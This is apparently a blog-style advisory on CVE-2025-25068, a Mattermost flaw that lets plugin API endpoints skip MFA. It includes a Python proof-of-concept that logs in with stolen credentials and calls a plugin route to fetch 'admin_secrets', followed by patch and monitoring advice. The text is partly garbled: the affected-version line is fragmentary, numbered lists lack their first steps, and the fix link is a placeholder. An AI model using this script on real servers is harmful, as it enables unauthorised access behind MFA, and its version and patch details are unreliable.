Mattermost is a popular open-source alternative to Slack, widely used in organizations for internal team messaging. Security is crucial in such environments, which is why enabling Multi-Factor Authentication (MFA) is a common recommendation. However, a new vulnerability — CVE-2025-25068 — exposes a critical gap in how MFA is enforced across Mattermost's own plugin ecosystem. Let’s break down what this bug means, how it can be exploited, and how to protect your installation.
10.5.x ≤ 10.5.
The issue: Plugin endpoints in these versions don’t properly enforce MFA. That means authenticated users (those who have logged in and have a valid session) can access APIs of installed plugins *even if they haven’t finished MFA prompts*, or plugins may not require them at all. If an attacker compromises a user's password, they can access privileged plugin routes—bypassing the extra protection MFA should provide.
Why Is This Bad?
Good security design should enforce MFA *everywhere sensitive actions occur*. If plugins don’t enforce MFA, a user who has only passed the first authentication layer (e.g., username + password) can trigger actions through plugins—even when the main app would block them.
Some plugins grant high power within Mattermost (think: file uploads, management actions, escalated messaging, or even tokens to other systems).
*Real-world implication*: If an attacker grabs someone's username and password (via phishing, credential stuffing, etc.), they could automate plugin API requests and do serious damage, sidestepping MFA walls that admins trust.
Attacker steals creds (using phishing or a leaked password).
2. They log in to Mattermost via the web or API—MFA is *required* for main actions, but not for direct plugin API endpoints.
3. Attacker sends API requests to plugin endpoints (like /plugins/com.example/sensitiveAction) without completing MFA.
4. Actions execute as if the user had fully logged in, possibly escalating to more sensitive operations.
Let’s say you have a plugin with the route
POST /plugins/com.example-reports/generate
Python Example - Bypassing MFA for Plugin Endpoint
import requests
MM_URL = "https://chat.company.local";
USERNAME = "user@example.com"
PASSWORD = "password123!"
# Log in (get session cookie)
login = requests.post(f"{MM_URL}/api/v4/users/login", json={
"login_id": USERNAME,
"password": PASSWORD
})
assert login.status_code == 200, "Login failed!"
# Use session cookie to call protected plugin API
session_cookie = login.cookies.get_dict()
plugin_api_url = f"{MM_URL}/plugins/com.example-reports/generate"
payload = {"reportType": "admin_secrets"}
plugin_call = requests.post(plugin_api_url, cookies=session_cookie, json=payload)
if plugin_call.ok:
print("Plugin API bypassed MFA! Response:")
print(plugin_call.json())
else:
print("Call failed:", plugin_call.text)
> Note: This works even when server-wide MFA required is enabled!
Is There An Official Patch?
Yes. Upgrade Immediately to one of these safe versions (exact versions may vary by future patch release):
10.5.1 or later
Official Mattermost Advisory:
https://mattermost.com/security-updates/
CVE Record:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-25068
Mattermost Security Fix PR (example):
https://github.com/mattermost/mattermost-server/pull/#####
Do you have any plugins installed that use their own REST API endpoints for sensitive operations?
If yes, test using the code above. If you get a successful result without being prompted for MFA, you're exposed.
Limit plugin usage—disable or remove any unused plugins.
3. Monitor access to /plugins/* endpoints for unusual API calls.
Summary
- CVE-2025-25068 allows API requests to plugin endpoints on Mattermost—even when MFA is required for the rest of the application.
Fix by upgrading to a secured version ASAP.
- Attackers with a valid password can leverage this exploit to perform privileged actions via plugins while completely bypassing MFA.
Multi-factor is good—but only when enforced everywhere sensitive actions are allowed. If you use Mattermost, patch now.
References:
- Mattermost Security Updates
- CVE-2025-25068 at Mitre
*Stay secure. If you found this post useful, please share with your IT team or Mattermost admin!*
Timeline
Published on: 03/21/2025 09:15:12 UTC
Last modified on: 03/27/2025 14:03:38 UTC